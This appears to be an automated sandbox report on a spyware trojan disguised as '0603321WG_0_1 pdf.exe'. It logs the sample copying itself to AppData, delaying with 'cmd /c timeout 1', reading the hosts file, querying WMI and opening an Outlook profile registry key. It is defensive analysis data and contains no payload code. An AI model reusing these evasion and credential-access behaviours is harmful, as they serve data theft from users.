                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 27_2_05684650
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 27_2_05684630
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 27_2_05685390
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 27_2_0568D281
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 28_2_02FE46A0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 28_2_02FE4672
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 28_2_02FE4630
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 276
                      Source: 0603321WG_0_1 pdf.exeStatic PE information: invalid certificate
                      Source: 0603321WG_0_1 pdf.exeBinary or memory string: OriginalFilename vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.674955398.0000000004485000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.672052071.00000000032A9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameJcue ESf.exe2 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.684283950.00000000059F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.684283950.00000000059F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.684453359.0000000005C10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000000.643196446.0000000000812000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUAudJRAa.exe2 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.684560546.0000000005DB0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exeBinary or memory string: OriginalFilename vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912069890.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameJcue ESf.exe2 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912313952.0000000001030000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.909531429.00000000007C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUAudJRAa.exe2 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmpBinary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb1
                      Source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/14@4/3
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile created: C:\Users\user\AppData\Roaming\NewAppJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7056
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4972
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD18D.tmpJump to behavior
                      Source: 0603321WG_0_1 pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: 0603321WG_0_1 pdf.exeReversingLabs: Detection: 21%
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile read: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe 'C:\Users\user\Desktop\0603321WG_0_1 pdf.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 276
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1464
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 1896
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeProcess created: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0603321WG_0_1 pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 0603321WG_0_1 pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829638034.0000000004DE4000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdbse$je source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbOe@j source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbYX&n source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbF source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\Desktop\0603321WG_0_1 pdf.PDB source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdbUe:jC source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\0603321WG_0_1 pdf.PDB13 source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: CLBCatQ.pdb4 source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb< source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb;^ source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbL source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbW% source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbN source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: psapi.pdb#N source: WerFault.exe, 0000001F.00000003.829483729.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670942444.0000000000EBA000.00000004.00000020.sdmp
                      Source: Binary string: iertutil.pdbP source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb] source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbK source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001F.00000003.829638034.0000000004DE4000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdb^ source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdbd source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdbIeNj source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: rasadhlp.pdb. source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: edputil.pdbCeTj source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbae6je source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
